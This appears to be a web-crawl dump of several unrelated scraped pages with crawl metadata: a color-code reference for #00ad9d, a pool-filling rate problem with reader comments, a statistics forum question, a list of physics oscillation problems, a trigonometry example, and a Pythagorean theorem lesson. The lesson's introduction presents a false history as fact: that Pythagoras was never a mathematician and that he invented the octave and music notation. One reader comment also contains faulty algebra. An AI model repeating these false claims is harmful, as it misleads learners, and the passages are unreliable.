44445.\n\nHex triplet RGB Decimal 00ad9d `#00ad9d` 0, 173, 157 `rgb(0,173,157)` 0, 67.8, 61.6 `rgb(0%,67.8%,61.6%)` 100, 0, 9, 32 174.5°, 100, 33.9 `hsl(174.5,100%,33.9%)` 174.5°, 100, 67.8 009999 `#009999`\nCIE-LAB 63.606, -40.726, -2.347 21.027, 32.319, 37.026 0.233, 0.358, 32.319 63.606, 40.794, 183.298 63.606, -50.85, 2.625 56.85, -33.465, 1.179 00000000, 10101101, 10011101\n\n# Color Schemes with #00ad9d\n\n``#00ad9d` `rgb(0,173,157)``\n``#ad0010` `rgb(173,0,16)``\nComplementary Color\n``#00ad47` `rgb(0,173,71)``\n``#00ad9d` `rgb(0,173,157)``\n``#0067ad` `rgb(0,103,173)``\nAnalogous Color\n``#ad4700` `rgb(173,71,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#ad0067` `rgb(173,0,103)``\nSplit Complementary Color\n``#ad9d00` `rgb(173,157,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#9d00ad` `rgb(157,0,173)``\n``#10ad00` `rgb(16,173,0)``\n``#00ad9d` `rgb(0,173,157)``\n``#9d00ad` `rgb(157,0,173)``\n``#ad0010` `rgb(173,0,16)``\n• #006158\n``#006158` `rgb(0,97,88)``\n• #007a6f\n``#007a6f` `rgb(0,122,111)``\n• #009486\n``#009486` `rgb(0,148,134)``\n``#00ad9d` `rgb(0,173,157)``\n• #00c7b4\n``#00c7b4` `rgb(0,199,180)``\n• #00e0cb\n``#00e0cb` `rgb(0,224,203)``\n• #00fae2\n``#00fae2` `rgb(0,250,226)``\nMonochromatic Color\n\n# Alternatives to #00ad9d\n\nBelow, you can see some colors close to #00ad9d. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n``#00ad72` `rgb(0,173,114)``\n``#00ad80` `rgb(0,173,128)``\n``#00ad8f` `rgb(0,173,143)``\n``#00ad9d` `rgb(0,173,157)``\n``#00adab` `rgb(0,173,171)``\n``#00a0ad` `rgb(0,160,173)``\n``#0092ad` `rgb(0,146,173)``\nSimilar Colors\n\nThis text has a font color of #00ad9d.\n\n``<span style=\"color:#00ad9d;\">Text here</span>``\n\nThis paragraph has a background color of #00ad9d.\n\n``<p style=\"background-color:#00ad9d;\">Content here</p>``\n\nThis element has a border color of #00ad9d.\n\n``<div style=\"border:1px solid #00ad9d;\">Content here</div>``\nCSS codes\n``.text {color:#00ad9d;}``\n``.background {background-color:#00ad9d;}``\n``.border {border:1px solid #00ad9d;}``\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #00100f is the darkest color, while #fbffff is the lightest one.\n\n• #00100f\n``#00100f` `rgb(0,16,15)``\n• #002420\n``#002420` `rgb(0,36,32)``\n• #003732\n``#003732` `rgb(0,55,50)``\n• #004b44\n``#004b44` `rgb(0,75,68)``\n• #005f56\n``#005f56` `rgb(0,95,86)``\n• #007268\n``#007268` `rgb(0,114,104)``\n• #008679\n``#008679` `rgb(0,134,121)``\n• #00998b\n``#00998b` `rgb(0,153,139)``\n``#00ad9d` `rgb(0,173,157)``\n• #00c1af\n``#00c1af` `rgb(0,193,175)``\n• #00d4c1\n``#00d4c1` `rgb(0,212,193)``\n• #00e8d2\n``#00e8d2` `rgb(0,232,210)``\n• #00fbe4\n``#00fbe4` `rgb(0,251,228)``\n• #10ffe9\n``#10ffe9` `rgb(16,255,233)``\n• #24ffeb\n``#24ffeb` `rgb(36,255,235)``\n• #37ffed\n``#37ffed` `rgb(55,255,237)``\n• #4bffee\n``#4bffee` `rgb(75,255,238)``\n• #5ffff0\n``#5ffff0` `rgb(95,255,240)``\n• #72fff2\n``#72fff2` `rgb(114,255,242)``\n• #86fff4\n``#86fff4` `rgb(134,255,244)``\n• #99fff6\n``#99fff6` `rgb(153,255,246)``\n``#adfff7` `rgb(173,255,247)``\n• #c1fff9\n``#c1fff9` `rgb(193,255,249)``\n• #d4fffb\n``#d4fffb` `rgb(212,255,251)``\n• #e8fffd\n``#e8fffd` `rgb(232,255,253)``\n• #fbffff\n``#fbffff` `rgb(251,255,255)``\nTint Color Variation\n\n# Tones of #00ad9d\n\nA tone is produced by adding gray to any pure hue. In this case, #505d5c is the less saturated color, while #00ad9d is the most saturated one.\n\n• #505d5c\n``#505d5c` `rgb(80,93,92)``\n• #496461\n``#496461` `rgb(73,100,97)``\n• #436a67\n``#436a67` `rgb(67,106,103)``\n• #3c716c\n``#3c716c` `rgb(60,113,108)``\n• #357872\n``#357872` `rgb(53,120,114)``\n• #2f7e77\n``#2f7e77` `rgb(47,126,119)``\n• #28857c\n``#28857c` `rgb(40,133,124)``\n• #218c82\n``#218c82` `rgb(33,140,130)``\n• #1b9287\n``#1b9287` `rgb(27,146,135)``\n• #14998d\n``#14998d` `rgb(20,153,141)``\n• #0da092\n``#0da092` `rgb(13,160,146)``\n• #07a698\n``#07a698` `rgb(7,166,152)``\n``#00ad9d` `rgb(0,173,157)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #00ad9d is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.53034216,"math_prob":0.8518716,"size":3673,"snap":"2019-13-2019-22","text_gpt3_token_len":1611,"char_repetition_ratio":0.13682202,"word_repetition_ratio":0.011111111,"special_character_ratio":0.54696435,"punctuation_ratio":0.23276836,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9901129,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-26T21:03:20Z\",\"WARC-Record-ID\":\"<urn:uuid:f4b6556e-a8b7-41f1-abda-9084c8861f0d>\",\"Content-Length\":\"36377\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2699a68b-3eeb-4f85-9d2e-d5eed5fc6d57>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac8fb03e-07ff-4d6c-af7d-805e1fd8f972>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/00ad9d\",\"WARC-Payload-Digest\":\"sha1:HEVTFAG6IVWRZEVZETKWWLOFCCBJGL6R\",\"WARC-Block-Digest\":\"sha1:LP7EJVCKYBEGVUWDQDLFQLIPQ6YFROPA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912206016.98_warc_CC-MAIN-20190326200359-20190326222359-00184.warc.gz\"}"}
https://www.hackmath.net/en/math-problem/438
[ "# Pool\n\nIf water flows into the pool by two inlets, fill the whole for 19 hours. The first inlet filled pool 5 hour longer than the second. How long pool take to fill with two inlets separately?\n\nt1 =  40.66 h\nt2 =  35.66 h\n\n### Step-by-step explanation:\n\nOur quadratic equation calculator calculates it.", null, "Did you find an error or inaccuracy? Feel free to write us. Thank you!", null, "Math student\n1/t1+1/(t1-10)=1/18\nmultiply each term by18(t1)(t1-10)\nthat results in\n18(t1-10)+18t1=t1(t1)(t1)-10t1\nusing the quadratic formula results in t1=-49.6 and 3.63\n\n2 years ago  2 Likes", null, "Dr Math\nright side of equation is wrong - should be t1*(t1-10) = t12 - 10*t1 now t13-10t1", null, "Math student\nthe problems seems to have changed - - - t2 is now equal t1-6\n\ntherefore 1/t1+1/(t1-6)=1/18\nmultiplying each term by18(t1)(t1-6) ==== 18(t1-6)+18t1=t1(t1-6), simplifying further 18t1-108+18t1=t12-6t1\nor 0=t12-6t1-18t1+108\ngraphing y=18(t1-6)+18t1-t1(t1-6) results in t1=39.25 hours and t2=39.25-6=33.25 hours (same as your NEW answer!!!!", null, "Tips to related online calculators\nLooking for calculator of harmonic mean?\nLooking for a statistical calculator?\nLooking for help with calculating roots of a quadratic equation?\nDo you have a linear equation or system of equations and looking for its solution? Or do you have a quadratic equation?\nTip: Our volume units converter will help you with the conversion of volume units.\nDo you want to convert time units like minutes to seconds?\n\n## Related math problems and questions:\n\n• Two pipes", null, "How long will the pool be filled with a double supply pipe if it takes the pool to fill the first pipe by 4 hours longer and the second pipe 9 hours longer than both pipes open at the same time?\n• Water pool", null, "Pool with volume 990hl completely filled, if water flows by one tap 8 hours and by second tap 6 hours. First tap give 10hl more than second per hour. How many hl flows in each of them in an hour?\n• Water reservoir", null, "The water reservoir is filled through one inlet 4 hours later than both together, then another inlet 9 hours later. For how long is filled by each separately?\n• Tributaries", null, "The first tributary fill pool with water in 15 hours. The second tributary fill pool in 10 hours. For how many hours the pool is filled with both tributaries?\n• Four pavers", null, "Four pavers would pave the square in 18 days. How many pavers do you need to add to done work in 12 days?\n• Three pumps", null, "We are filling the pool. The first pump would be filled in 12 hours, the second pump in 15 hours. If all three pumps were running at the same time, it would fill the pool for 4 hours. How long would the pool fill only with the third pump?\n• The dam", null, "The water reservoir is filled with first tributary for 25 hours second tributary for 35 hours. Some time were both inlets open, then a second tributary closed and the tank was filled in four hours. What time water flowed from both tributaries? (Expressed\n• The pool", null, "The pool contains 220 m3 of water. The pool can be emptied either: a) 10 hours of pipe B and 8 hours of pipe A, or b) 10 hours of pipe A and 7 hours of pipe B. How many cubic meters of water will flow in 1 hour from pipe A and how many from pipe B?\n• Tank No 8", null, "Tank is filled by one inlet valve with a flow rate of 12 liters per second in 72 minutes. How long take the tank to fill, if we open half an hour after one more inlet?\n• Pool", null, "Pool is filled with two water supply. The first supply fill pool for nine hours, the second for six hours. How many hours will take fill the pool when the water flows in through the first supply 3 hours and then we will open a second supply?\n• 4 pipes", null, "The tank flows out by 4 pipes in 6 hours 120 hl water. How much water flows out of 5 pipes of the same diameter in 14 hours?\n• Speed of Slovakian trains", null, "Rudolf decided to take the train from the station 'Ostratice' to 'Horné Ozorovce'. In the train timetables found train Os 5409 : km 0 Chynorany 15:17 5 Ostratice 15:23 15:23 8 Rybany 15:27 15:27 10 Dolné Naštice 15:31 15:31 14 Bánovce nad Bebravou 15:35 1\n• Tributaries", null, "We can fill the pool with two different tributaries. The first inflow would fill the pool in 18 hours, both in 6 hours. How many hours would the pool fill with a second inflow?\n• Two pipes", null, "One pipe fill one-fifth volume 20 minutes before by second one. The two pipes together will fill the tank in two hours. How long is will fill tank each pipe separately?\n• Pumps 3", null, "Two pumps of the same power fill the garden pool for 10 hours. How many of these pumps would have to use if we want to shorten the filling of the pool to four hours?\n• Pool 2", null, "The first supply by the pool fill for five hours and the second fill for six hours, drain should be drained for 15 hours. For how many hours the pool is full, when we open both inlet now and outlet open two hours later?\n• Oil tank and pipes", null, "The underground oil tank can be filled by two oil pipelines. The first is filled in 72 hours and the second in 48 hours. How many hours from the moment when first pipeline began to fill the oil is it necessary to start filling it with the second to fill i" ]
[ null, "https://www.hackmath.net/img/38/pool.jpg", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/hashover/images/avatar.png", null, "https://www.hackmath.net/thumb/13/t_7613.jpg", null, "https://www.hackmath.net/thumb/48/t_2048.jpg", null, "https://www.hackmath.net/thumb/2/t_2002.jpg", null, "https://www.hackmath.net/thumb/40/t_2640.jpg", null, "https://www.hackmath.net/thumb/59/t_8159.jpg", null, "https://www.hackmath.net/thumb/4/t_7404.jpg", null, "https://www.hackmath.net/thumb/42/t_2442.jpg", null, "https://www.hackmath.net/thumb/0/t_7400.jpg", null, "https://www.hackmath.net/thumb/93/t_2093.jpg", null, "https://www.hackmath.net/thumb/93/t_2993.jpg", null, "https://www.hackmath.net/thumb/90/t_1690.jpg", null, "https://www.hackmath.net/thumb/3/t_3.jpg", null, "https://www.hackmath.net/thumb/31/t_13231.jpg", null, "https://www.hackmath.net/thumb/25/t_2625.jpg", null, "https://www.hackmath.net/thumb/78/t_1878.jpg", null, "https://www.hackmath.net/thumb/88/t_1288.jpg", null, "https://www.hackmath.net/thumb/54/t_4954.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92863244,"math_prob":0.9123789,"size":5997,"snap":"2021-43-2021-49","text_gpt3_token_len":1683,"char_repetition_ratio":0.14133155,"word_repetition_ratio":0.20670392,"special_character_ratio":0.28580958,"punctuation_ratio":0.09287926,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98831624,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T05:59:55Z\",\"WARC-Record-ID\":\"<urn:uuid:8437fb06-af70-44c5-9167-88f60f606f02>\",\"Content-Length\":\"93617\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71ccb74e-0eec-4d4b-9726-47291fad982f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0f70bd75-3e7d-4008-9753-bc86af78896a>\",\"WARC-IP-Address\":\"172.67.143.236\",\"WARC-Target-URI\":\"https://www.hackmath.net/en/math-problem/438\",\"WARC-Payload-Digest\":\"sha1:W5FMMMARL55HB4S7WQZSRUF3N5ML66P3\",\"WARC-Block-Digest\":\"sha1:NNR2SJQI5KILOUZNG5TCLA4BJFP5SVMX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587799.46_warc_CC-MAIN-20211026042101-20211026072101-00074.warc.gz\"}"}
https://able2know.org/topic/355795-1
[ "0\n\n# sampling from conditonal distribution of missing random vector given a complete random vector\n\nTue 29 Nov, 2016 02:50 pm\nsuppose i have complete random variable vector $Y$ with size $n$\nand this random vector $Y$ is partitioned into observed and missing vector\nas follows $Y =[Y_{obsv}, Y_{mis}]$, where missing is foloowing a dropout pattern, $Y_{mis}$ is of size $s$ and $Y_{obsv}$ is of size $n-s$ and we are interested of the first dropout which its missing is rely on the previous obsereved value and the missing value itselef via a logit model for probabiltiy\nof missing at occasion $i =1 :n$\n$logit(p_{i}) = \\phi_{1} +\\phi_{2}Y_{i-1}+\\phi_{3}Y_{i}$, Also missing is based on missing-mechanism $R_{i}$ which is equal one if value is missing and equal zero if value is observed. the missing mechanism is distributed as multi-nomial. Also The complete Vector $Y$ has the following relation $Y = X+Z$, WHERE $X$ and $z$ are independent random vector variables and $X$ is distributed as multivariate noraml and $z$ is distributed as multivariate t\n• Topic Stats\n• Top Replies" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9054061,"math_prob":0.9998314,"size":960,"snap":"2019-51-2020-05","text_gpt3_token_len":273,"char_repetition_ratio":0.13179916,"word_repetition_ratio":0.0,"special_character_ratio":0.27708334,"punctuation_ratio":0.05376344,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999572,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T18:25:13Z\",\"WARC-Record-ID\":\"<urn:uuid:51945fe9-a295-488a-a078-4f703520fd66>\",\"Content-Length\":\"17317\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d80f1b00-e431-4857-bc46-a57095d11b02>\",\"WARC-Concurrent-To\":\"<urn:uuid:21181f12-19a7-467e-b406-6e71d4116bca>\",\"WARC-IP-Address\":\"104.26.0.81\",\"WARC-Target-URI\":\"https://able2know.org/topic/355795-1\",\"WARC-Payload-Digest\":\"sha1:DTDAWOCTW5F5TJTHV3HLWNMAVMFEEJSR\",\"WARC-Block-Digest\":\"sha1:5PYLEF6WD2BG35ZDPREFDIK5VKPSBO4R\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575541288287.53_warc_CC-MAIN-20191214174719-20191214202719-00410.warc.gz\"}"}
https://brainmass.com/physics/periodic-motion/pg3
[ "Explore BrainMass\nShare\n\nPeriodic Motion\n\nSimple Harmonic Motion - Mass and Period\n\nThe position of a mass oscillating on a spring is given by x=(5.2 cm)cos[2pi t/(0.54 s)]. (a) What is the period of this motion? (b) When is the mass first at the position x=0?\n\nPeriod of Pendulum\n\nThe period T (in seconds) of a simple pendulum is a function of its length l (in feet), given by: T(l)=2pie sqrt 1/g Express the length l as a function of the period T.\n\nA tranverse traveling\n\nA tranverse traveling wave is described by the equation y(x,t) = 10 sin(8 pie + pieT), where x and y are in meters and t in seconds. the wavelength and freaquency of the wave are a. .25m and .5 hz b. 4m and .5hz c. .25m and 2hz d. 4m and 2hz\n\nPendulum Amplitude and Period\n\nWhen the amplitude of a pendulum decreases to half its initial value, the period will have: a. Halved b. Doubled c. Remain the same\n\nFinding the radius of a circle\n\nPlease see the attachment. I do not have notes as to how to determine the radius, would you please walk me through the steps?\n\nS and P waves from an earthquake travel at different speeds and this difference helps in the determination of the earthquake \"epicenter\", (where the disturbance took place). (a) Assuming typical speeds of 9.0km/s and 5.5 km/s for P and S waves, respectively, how far away did the earthquake occur if a particular seismic statio\n\nWaves, wave speed/type\n\nA fisherman notices that wave crests pass the bow of his anchored boat every 4.0seconds. He measures the distance between two crests to be 9.0 m. How fast are the waves traveling? **please explain this in the simplest, least confusing way....thank you so much :)\n\nEquation of a particle on a spring\n\nA particle with a mass of .500 kg is attached to a spring with a force constant of 50.0 N/m. At time t=0 the particle has its maximum spreed of 20.0 m/s and is moving to the left. (a) Determine the particle's equation of motion, specifying its position as a function of time. (b) Where in the motion is the potential energy thre\n\nMass of a Pendulum\n\nPlease do not place your response in a .pdf or .cdx format, but Word documents are okay. Thanks! Here's the actual problem: Does the mass of a pendulum (brass vs aluminum) affect the period? Explain.\n\nWhat is the amplitude of the oscillation?\n\nA. What is the amplitude of the oscillation shown in the figure? B. What is the frequency of this oscillation? C. What is the phase constant?\n\nPeriodic Motion of Vibrating Spring\n\nA spring vibrates with a frequency of 3.0 Hz when a weight of 0.50 kg is hung from it. What will its frequency be if only 0.35 kg hangs from it?\n\nA Fisherman's Scale: Spring Constants and Vibrations\n\nA fisherman's scale stretches 2.8cm when a 3.7kg fish hangs from it. (a) What is the spring constant? (b) What will be the amplitude and frequency of vibration if the fish is pulled down 2.5cm more and released so that it vibrates up and down? *please explain this as simply and clearly as possible, thank you so much :)\n\nAmplitude of Spring Without Friction\n\nA 2.00 kg object attached to a spring moves without friction and is driven by an external force given by: F = (3.00N) sin(2t) If the force constant of the spring is 20.0N/m, determine a) the period b) the amplitude of the motion.\n\nWave Direction and Wind\n\nOn a rather cold and rainy day we observed that the wind was blowing from the NE and the waves were traveling in all directions. Why would this be?\n\nDynamics for Unit Mass Moving\n\nA particle of unit mass moving on the x axis has equation of motion (FUNCTION1) and the initial conditions are (FUNCTION2). show that (FUNCTION3) and deduce that the motion is an oscillation between x=1 and x=3 with period (FUNCTION4). By making the substitution (FUNCTION5) or otherwise show that (FUNCTION6). (PLEASE SEE ATTA\n\nFinding the Spring Constant\n\nA 10-cm-long spring is attached to the ceiling. When a 2.0 kg mass is hung from it, the spring stretches to a length of 15 cm. (a) What is the spring constant k? (b) How long is the spring when a 3.0 kg mass is suspended from it?\n\nPhysics: Spring Scale Question\n\nA 6.30 kg mass hanging from a spring scale is slowly lowered onto a vertical spring, as shown in the figure (*please see attachment) A. What does the spring scale read just before the mass touches the lower spring? B. The scale reads 16.0 N when the lower spring has been compressed by 2.70 cm. What is the value of the spring\n\nInductor and capacitor in a series or parallel\n\nHi. Can someone please help me with this conceptual question? An inductor and a capacitor are to be connected to a generator. Will the generator supply more current at a low frequency if the inductor and capacitor are connected in series or in parallel? Thank you.\n\nTraveling wave from known amplitude, frequency and wavelength.\n\nA wave traveling on a wire has a frequency f= .8 cy/sec, an amplitude Y= .18 m and a wavelength L= 4.0 m. At a time t= .25 sec, find the x coordinates of all the crests.\n\nSimple pendulum changes length during half of one cycle.\n\nA simple pendulum consists of a small marble suspended from nail #1 by a cord whose length is 12 m. Nail #1 is 6 m below nail #1, so that as the pendulum swings, the cord is caught on nail #2 when the cord is vertical. The marble is pulled a small distance from center and released at rest. see ATTACHMENT for a diagram of the e\n\nHarmonic oscillator and the first excited state\n\nFind the question attached. The first excited states of the harmonic oscillators is see attached (a) Fine the normalization constant C_1- (b) Find the expectation values of <x p> and <p x> should that see attached\n\nPractice on Sinusoidal Wave\n\nI am given a V peak of 3.98v, and a V trough of 1.49v. I found the Amplitude to be 2.49. I am now asked to find V e = V rms and I am not sure what is being asked or how to do the problem. Please provide assistance.\n\nFinding parameters of a wave\n\nFind the amplitude, period and the phase and then sketch (i) f(x) = 2 cos x + Pi (ii) f(x) = 2 sin (2x+ (Pi/2))\n\nFinding angle and magnitude\n\nIn an assembly operation, a robot moves an object first straight upwards and then to the east, around an arc forming on quarter of a circle of radius 4.80 that lies in an east-west vertical plane. The robot then moves the object upward and to the north, through a quarter of a circle of radius 3.70 cm that lies in a north south\n\nFrame of Pivot Axis Corner\n\nSEE ATTACHMENT #1 for a diagram of the given parameters. A rectangular frame is made from two thin, uniform bars of length L= 4 m, mass A= 6 kg, and two of length W= 3 m, mass B= 1.5 kg. The frame is placed on a pivot axis at one corner and executes SHM about that axis. Find the period of this SHM oscillation.\n\nCalculating Moment of Inertia: Example Problem\n\nAn irregular piece of sheet metal mounted on a pivot at a distance of .62 m from the cm. About this pivot point, it oscillates with SHM with a period measured at 2.25 seconds. Part A: Find the moment of inertia about the pivot axis. Part B: Find the moment of inertia about the cm axis.\n\nFrequency of an oscillating spring using Hooke's Law\n\nSee the attached file.\n\nMass and spring properties when in simple harmonic motion.\n\nA mass sits on a frictionless table. It is attached to a wall by a spring. The mass is initially located at x = 0 when the spring is unstretched (equilibrium position). You pull the mass away from the equilibrium position, out to x = A, and then release it. The mass then oscillates horizontally back and forth in simple harmonic\n\nSpeed and wavelength of water waves given distance\n\nWater waves in a lake travel 4.4 m in 1.8s. The period of oscillation is 1.2 s. a. What is the speed of water waves? b. What is their wavelength?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9246012,"math_prob":0.9768571,"size":6786,"snap":"2019-26-2019-30","text_gpt3_token_len":1776,"char_repetition_ratio":0.12872308,"word_repetition_ratio":0.06041828,"special_character_ratio":0.2605364,"punctuation_ratio":0.11583769,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99669284,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-17T08:13:28Z\",\"WARC-Record-ID\":\"<urn:uuid:5b8550f7-54dc-4aed-97dd-e9c3426de6ae>\",\"Content-Length\":\"100008\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f3883d30-44f8-47a4-9132-27bb7551d2fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:3edc9f17-b60d-4600-8e1e-e8277b9cfaab>\",\"WARC-IP-Address\":\"65.39.198.123\",\"WARC-Target-URI\":\"https://brainmass.com/physics/periodic-motion/pg3\",\"WARC-Payload-Digest\":\"sha1:OYIMNLGCA3RQQDJT2TF72R5SI2E7YJYC\",\"WARC-Block-Digest\":\"sha1:LPPV6RAMULUH5TNEI4HQASQIVNGPVTAE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998440.47_warc_CC-MAIN-20190617063049-20190617085049-00347.warc.gz\"}"}
https://www.teachoo.com/2224/586/Example-20---Find-solution-of-sin-x----root-3-2---Class-11/category/Examples/
[ "", null, "", null, "1. Chapter 3 Class 11 Trigonometric Functions (Term 2)\n2. Serial order wise\n3. Examples\n\nTranscript\n\nExample 20 Find the solution of sin x = – √3/2 Let sin x = sin y also sin x = (−√3)/2 From (1) and (2) sin y = (−√3)/2 sin y = sin 4/3 π ⇒ y = 4/3 π Step 2 Since sin x = sin y General Solution is x = n π + (–1)n y where n ∈ Z Putting y = 4𝜋/3 x = n π + (–1)n 4/3 π where n ∈ Z", null, "" ]
[ null, "https://d1avenlh0i1xmr.cloudfront.net/07b429ce-fef2-4975-887b-56a211dd1bc6slide1.jpg", null, "https://d1avenlh0i1xmr.cloudfront.net/26f2f2c7-7f38-4078-acb3-3d505095296cslide2.jpg", null, "https://delan5sxrj8jj.cloudfront.net/misc/Davneet+Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5923642,"math_prob":0.9999887,"size":985,"snap":"2021-43-2021-49","text_gpt3_token_len":326,"char_repetition_ratio":0.33944955,"word_repetition_ratio":0.114583336,"special_character_ratio":0.34213197,"punctuation_ratio":0.005263158,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99973756,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,6,null,6,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-24T19:13:15Z\",\"WARC-Record-ID\":\"<urn:uuid:c856464c-c3f2-4a93-87f4-cfb45319fa5f>\",\"Content-Length\":\"63906\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:568f4b23-a708-49d2-ae59-f5afe805705d>\",\"WARC-Concurrent-To\":\"<urn:uuid:9724355e-a27e-4d09-b55f-c12c08b755d9>\",\"WARC-IP-Address\":\"23.22.5.68\",\"WARC-Target-URI\":\"https://www.teachoo.com/2224/586/Example-20---Find-solution-of-sin-x----root-3-2---Class-11/category/Examples/\",\"WARC-Payload-Digest\":\"sha1:HQQ7654OLYMZMMWP45N6OD5ZFKMNNRND\",\"WARC-Block-Digest\":\"sha1:KDEVJ7MWT3DTYAOAK2WWMOW6L5VMJGXF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587593.0_warc_CC-MAIN-20211024173743-20211024203743-00045.warc.gz\"}"}
http://www.the-mathroom.ca/plgm/plgm2.2/plgm2.2.htm
[ "The Pythagorean Theorem\n\nPythagoras\n\nMost math text books preceded this theorem with an introduction to the ancient Greek named Pythagoras who contributed this most famous triangle theorem. They all claim that he was a great mathematician -- the founder of the Pythagorean School of mathematics. But that's not the true story!! Pythagoras was never a mathematician. He was a frustrated musician. He composed songs, but, since he lived at a time before anyone had invented a language with which to write music, he was unable to jam with his buddies on his original compositions -- something musicians and especially composers, have loved to do throughout history. So, Pythagoras went to Egypt to study math because he realized that some new version of algebra -- which is a language -- could be transformed into code to write music.\n\nAfter his studies in Egypt, Pythagoras returned to Greece where he established the Pythagorean School -- a school of music -- not mathematics. It was here that he invented the octave and the first version of the notation system we still use today to write music.\n\nIn this lesson, we discover his most famous mathematical theorem on right triangles which forms the basic theory of the branch of math called Trigonometry.\n\n.\n\nThe Pythagorean Theorem\n\nIn a right triangle, the square on the hypotenuse\nis equal to the sum of the squares on the other two sides.", null, "So, in the right-angled triangle ABC, c2 = a2 + b2\n\nThis statement can always be written in its two other forms:\n\nc2 – a2 = b2\n\nc2 – b2 = a2\n\nSo, given the lengths of two sides of a right triangle,\nwe can always find the length of the third side.\n\nNote: Don't forget to take the square root of , and\n\nNote: the hypotenuse is always the longest side facing the 90° angle.\nThe sides around the right angle are called legs.\nEither one can be considered the base or the height (altitude) when we need area.\n\n.\n\nExamples:\n\nFind the missing side in these right triangles.", null, ".\n\nPractice\n\n1) Find the missing side in these right triangles. Round to the nearest hundreth.", null, "2) Which of these are Pythagorean triples? Justify your answer.\n\n a) 3, 4, and 6 b) 15, 17 and 8 c) 13, 5 and 12 d) 8, 9 and 11\n\n3) Make a diagram and solve each of these word problems.\n\na) A 7-meter ladder is leaning against the wall of a house so that\nthe foot of the ladder is 2 meters from the wall.\nHow far up the wall is the top of the ladder?\n\nb) A ship leaves New York harbour and sails due East at 20 km/h for 2 hours.\nIt then turns directly south and sails at 25 km/h for 1 hour.\nHow far is the ship from New York harbour?\n\nc)", null, "The base of the great Pyramid of Khufu is a square with sides 230 m long.\nWhat is the length of the diagonal of the base?\n\n4) Find x to the nearest tenth of a centimeter.", null, ".\n\nSolutions\n\n1) a)", null, "b) This is the 3, 4, 5 triangle doubled so x = 10\n\nc)", null, "d) The Pythagorean triple 5, 12, 13 makes x = 12.\n\n.\n\n2)\n\n a) 3, 4, and 6 -- NO6² is not = 3² + 4² b) 15, 17 and 8 -- YES17² = 8² + 15² c) 13, 5 and 12 -- YES13² = 5² + 12² d) 8, 9 and 11 -- NO11² is not = 8² + 9²\n\n.\n\n3) a)", null, "b)", null, ".\n\n3 c) Since when we draw the diagonal, we make an isosceles right triangle with\nequal sides = 230 meters, the hypotenuse =", null, ".\n\n.\n\n4) Find x to the nearest tenth of a centimeter.", null, "Since the small triangle on the left is the famous 3, 4, 5 right triangle,\nx² = 6² + 5² which means", null, ".\n\n(all content © MathRoom Learning 